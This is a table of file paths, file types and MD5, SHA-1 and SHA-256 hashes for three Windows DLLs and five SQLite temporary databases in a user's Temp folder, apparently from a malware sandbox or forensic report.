C:\Users\user\AppData\Local\Temp\2fda\softokn3.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	67827DB2380B5848166A411BAE9F0632	F68F1096C5A3F7B90824AA0F7B9DA372228363FF	9A7F11C212D61856DFC494DE111911B7A6D9D5E9795B0B70BBBC998896F068AE
C:\Users\user\AppData\Local\Temp\2fda\ucrtbase.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	D6326267AE77655F312D2287903DB4D3	1268BEF8E2CA6EBC5FB974FDFAFF13BE5BA7574F	0BB8C77DE80ACF9C43DE59A8FD75E611CC3EB8200C69F11E94389E8AF2CEB7A9
C:\Users\user\AppData\Local\Temp\2fda\vcruntime140.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	7587BF9CB4147022CD5681B015183046	F2106306A8F6F0DA5AFB7FC765CFA0757AD5A628	C40BB03199A2054DABFC7A8E01D6098E91DE7193619EFFBD0F142A7BF031C14D
C:\Users\user\AppData\Local\Temp\3649440656163743943195.tmp	SQLite 3.x database, last written using SQLite version 3032001	81DB1710BB13DA3343FC0DF9F00BE49F	9B1F17E936D28684FFDFA962340C8872512270BB	9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
C:\Users\user\AppData\Local\Temp\364958597678243369805909.tmp	SQLite 3.x database, last written using SQLite version 3032001	00681D89EDDB6AD25E6F4BD2E66C61C6	14B2FBFB460816155190377BBC66AB5D2A15F7AB	8BF06FD5FAE8199D261EB879E771146AE49600DBDED7FDC4EAC83A8C6A7A5D85
C:\Users\user\AppData\Local\Temp\364961566067931661861453.tmp	SQLite 3.x database, last written using SQLite version 3032001	72A43D390E478BA9664F03951692D109	482FE43725D7A1614F6E24429E455CD0A920DF7C	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
C:\Users\user\AppData\Local\Temp\364969067119854362121246.tmp	SQLite 3.x database, last written using SQLite version 3032001	72A43D390E478BA9664F03951692D109	482FE43725D7A1614F6E24429E455CD0A920DF7C	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
C:\Users\user\AppData\Local\Temp\36497203491375066343531.tmp	SQLite 3.x database, last written using SQLite version 3032001	16B54B80578A453C3615068532495897	03D021364027CDE0E7AE5008940FEB7E07CA293C	75A16F4B0214A2599ECFBB1F66CAE146B257D11106494858969B19CABCB9B541